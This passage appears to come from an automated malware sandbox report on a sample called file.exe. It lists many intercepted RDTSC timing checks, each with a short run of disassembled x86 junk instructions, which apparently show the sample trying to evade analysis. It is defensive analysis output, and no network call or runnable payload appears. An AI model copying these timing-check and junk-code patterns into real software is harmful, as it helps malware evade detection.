0x00000046 pop ebx 0x00000047 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 721168 second address: 700B8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD0F8E1A7ABh 0x0000000f nop 0x00000010 add ecx, 72B01255h 0x00000016 mov edx, dword ptr [ebp+122D2DAAh] 0x0000001c call dword ptr [ebp+1245BD22h] 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 jmp 00007FD0F8E1A7AAh 0x0000002c jng 00007FD0F8E1A7A6h 0x00000032 push esi 0x00000033 pop esi 0x00000034 popad 0x00000035 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D2B8C second address: 6D2B91 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D2B91 second address: 6D2B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D2B9C second address: 6D2BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D2BA0 second address: 6D2BC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FD0F8E1A7A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD0F8E1A7B0h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D2BC0 second address: 6D2BC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 749734 second address: 749741 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD0F8E1A7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 749741 second address: 749760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jmp 00007FD0F8CDABF0h 0x0000000c jnp 00007FD0F8CDABECh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 749895 second address: 7498AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 749BBC second address: 749BD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8CDABF5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 749BD7 second address: 749BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 749BDB second address: 749BDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 749EDB second address: 749EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A195 second address: 74A19E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A19E second address: 74A1A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74E925 second address: 74E941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FD0F8CDABF1h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74E941 second address: 74E945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74E945 second address: 74E953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FD0F8CDAC00h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74EAF5 second address: 74EAFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74EDF4 second address: 74EDFA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74EDFA second address: 74EE08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FD0F8E1A7A8h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74EE08 second address: 74EE28 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD0F8CDABECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FD0F8CDABECh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74EE28 second address: 74EE48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0F8E1A7ADh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD0F8E1A7AAh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74F253 second address: 74F264 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74F264 second address: 74F269 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74F4F0 second address: 74F4FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FD0F8CDABE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74F4FC second address: 74F532 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD0F8E1A7ACh 0x00000008 jng 00007FD0F8E1A7A6h 0x0000000e pushad 0x0000000f jc 00007FD0F8E1A7A6h 0x00000015 push eax 0x00000016 pop eax 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push esi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FD0F8E1A7B7h 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74F664 second address: 74F676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FD0F8CDABE6h 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74F676 second address: 74F680 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD0F8E1A7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74F680 second address: 74F6B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b jmp 00007FD0F8CDABF2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74F6B0 second address: 74F6E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jnl 00007FD0F8E1A7A6h 0x0000000c jbe 00007FD0F8E1A7A6h 0x00000012 popad 0x00000013 pushad 0x00000014 jg 00007FD0F8E1A7A6h 0x0000001a jmp 00007FD0F8E1A7B5h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74F6E1 second address: 74F6E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7535DD second address: 7535E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7535E3 second address: 7535E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7535E7 second address: 7535ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7535ED second address: 7535F9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD0F8CDABEEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757F9F second address: 757FB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FD0F8E1A7A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007FD0F8E1A7A6h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C249 second address: 75C261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FD0F8CDABE6h 0x0000000d jmp 00007FD0F8CDABEBh 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C261 second address: 75C265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C265 second address: 75C275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007FD0F8CDABE6h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C79E second address: 75C7A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C7A2 second address: 75C7A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D183 second address: 75D19D instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD0F8E1A7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD0F8E1A7ACh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75FE67 second address: 75FE6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75FE6B second address: 75FEA0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD0F8E1A7B7h 0x0000000d popad 0x0000000e push ebx 0x0000000f push edi 0x00000010 jmp 00007FD0F8E1A7B1h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762269 second address: 762270 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763DF6 second address: 763E06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FD0F8E1A7A6h 0x0000000a jo 00007FD0F8E1A7A6h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763E06 second address: 763E23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763E23 second address: 763E29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765455 second address: 765459 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7699CD second address: 7699DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD0F8E1A7A6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7699DF second address: 7699EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7699EA second address: 769A0D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FD0F8E1A7B7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76B346 second address: 76B351 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76F929 second address: 76F958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jnp 00007FD0F8E1A7A6h 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007FD0F8E1A7B6h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push edi 0x00000018 pop edi 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76F958 second address: 76F95E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76F95E second address: 76F96F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7ADh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720A61 second address: 720A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720A65 second address: 720AA8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnp 00007FD0F8E1A7A6h 0x0000000d pop ecx 0x0000000e popad 0x0000000f push eax 0x00000010 jp 00007FD0F8E1A7AEh 0x00000016 nop 0x00000017 add dword ptr [ebp+122D17D3h], ebx 0x0000001d mov ebx, dword ptr [ebp+12494C9Eh] 0x00000023 adc ecx, 6E309C2Ah 0x00000029 add eax, ebx 0x0000002b sbb di, 95FFh 0x00000030 push eax 0x00000031 js 00007FD0F8E1A7B8h 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720AA8 second address: 720AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 770995 second address: 77099B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7749EC second address: 7749F9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7749F9 second address: 774A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD0F8E1A7A6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 774A06 second address: 774A27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FD0F8CDABE6h 0x00000009 jmp 00007FD0F8CDABF1h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 774A27 second address: 774A2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 773FAD second address: 773FB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 773FB1 second address: 773FC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 774511 second address: 77452E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FD0F8CDABF5h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77452E second address: 774578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a js 00007FD0F8E1A7A6h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FD0F8E1A7B2h 0x00000017 jmp 00007FD0F8E1A7B2h 0x0000001c popad 0x0000001d jmp 00007FD0F8E1A7B3h 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77CC99 second address: 77CCAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0F8CDABEFh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77CCAF second address: 77CCC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7AFh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BB59 second address: 77BB70 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD0F8CDABE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jbe 00007FD0F8CDABE6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BE2C second address: 77BE30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BE30 second address: 77BE3F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jno 00007FD0F8CDABE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BE3F second address: 77BE5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD0F8E1A7A6h 0x0000000a jng 00007FD0F8E1A7A6h 0x00000010 jmp 00007FD0F8E1A7ADh 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BE5D second address: 77BE99 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD0F8CDABF2h 0x00000008 jmp 00007FD0F8CDABECh 0x0000000d jne 00007FD0F8CDABEEh 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push edx 0x00000016 jmp 00007FD0F8CDABEDh 0x0000001b push eax 0x0000001c push edx 0x0000001d jnp 00007FD0F8CDABE6h 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BE99 second address: 77BE9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77C6E0 second address: 77C6EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77C6EA second address: 77C711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jns 00007FD0F8E1A7A6h 0x0000000f push edi 0x00000010 pop edi 0x00000011 jmp 00007FD0F8E1A7B5h 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 781600 second address: 781605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 785368 second address: 785379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jbe 00007FD0F8E1A7A6h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 785379 second address: 785392 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD0F8CDABE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8CDABEBh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 785392 second address: 785396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 784612 second address: 78461C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78461C second address: 78463A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 jmp 00007FD0F8E1A7B4h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78463A second address: 78463F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 784A47 second address: 784A68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FD0F8E1A7A8h 0x0000000e pushad 0x0000000f popad 0x00000010 ja 00007FD0F8E1A7B1h 0x00000016 jmp 00007FD0F8E1A7ABh 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 784C26 second address: 784C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 jno 00007FD0F8CDABE6h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 je 00007FD0F8CDABEEh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 784F5A second address: 784F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 jmp 00007FD0F8E1A7AAh 0x0000000b pop esi 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 784F6B second address: 784F71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 784F71 second address: 784F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78CA54 second address: 78CA5E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD0F8CDABE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
